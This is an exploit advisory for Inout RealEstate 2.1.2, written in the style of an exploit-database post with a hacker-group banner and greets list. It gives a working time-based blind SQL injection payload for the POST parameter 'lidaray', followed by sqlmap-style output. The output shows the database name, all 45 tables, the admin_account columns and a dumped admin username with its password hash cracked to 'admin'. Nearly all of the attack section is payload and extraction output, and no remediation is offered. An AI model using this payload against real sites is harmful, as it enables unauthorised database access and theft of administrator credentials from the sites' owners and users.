Vulnerabilities

Inout RealEstate 2.1.2 SQL Injection

┌┌──────────────────────────^ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : inoutscripts.com │ │ │
│ Vendor : Inout Scripts │ │ │
│ Software : Inout RealEstate 2.1.2 │ │ Inout RealEstate is an easy, flexible │
│ Vuln Type: Remote SQL Injection │ │ and simple property management solution │
│ Method : GET │ │ ideal for business start-ups │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7

CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


POST parameter 'lidaray' is vulnerable.

---
Parameter: lidaray (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: lidaray=20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb
---

[INFO] the back-end DBMS is MySQL

[INFO] fetching current database
current database: 'inout_realestate'


fetching tables for database: 'inout_realestate'

Database: inout_realestate
[45 tables]
+--------------------------------+
| adcode |
| admin_account |
| admin_payment_details |
| agent_list_request_to_user |
| broker_citymap |
| broker_rate |
| broker_review |
| brokerabusereport |
| category_property |
| chat_details |
| chat_messages |
| checkout_ipn |
| countries |
| custom_field |
| detail_statistics_list |
| email_templates |
| enquiry_status |
| forgetpassword |
| inout_ipns |
| invoicegen |
| languages |
| list_brokermap |
| list_images |
| list_main |
| listopenhouse |
| normal_statistics_list |
| paymentdetailstat |
| ppc_currency |
| public_side_media_detail |
| public_slide_images |
| pupularsiarchlist |
| recentsearchlist |
| settings |
| sold_listing |
| soldlistadd |
| traveller_bank_deposit_history |
| user_broker_licenses |
| user_broker_registration |
| user_email_verification |
| user_list_agent_request |
| user_registration |
| user_wishlist_mapping |
| userabusereport |
| userlistactive |
| wish_list |
+--------------------------------+


[INFO] fetching columns for table 'admin_account' in database 'inout_realestate'

Database: inout_realestate
Table: admin_account
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| admin_type | tinyint(4) |
| id | int(11) |
| logouttime | int(11) |
| password | varchar(255) |
| status | tinyint(4) |
| username | varchar(200) |
+------------+--------------+


[INFO] fetching entries of column(s) 'admin_type,id,password,username' for table 'admin_account' in database 'inout_realestate'

Database: inout_realestate
Table: admin_account
[1 entry]
+----+----------+------------------------------------------+------------+
| id | username | password | admin_type |
+----+----------+------------------------------------------+------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) | 0 |
+----+----------+------------------------------------------+------------+


[-] Done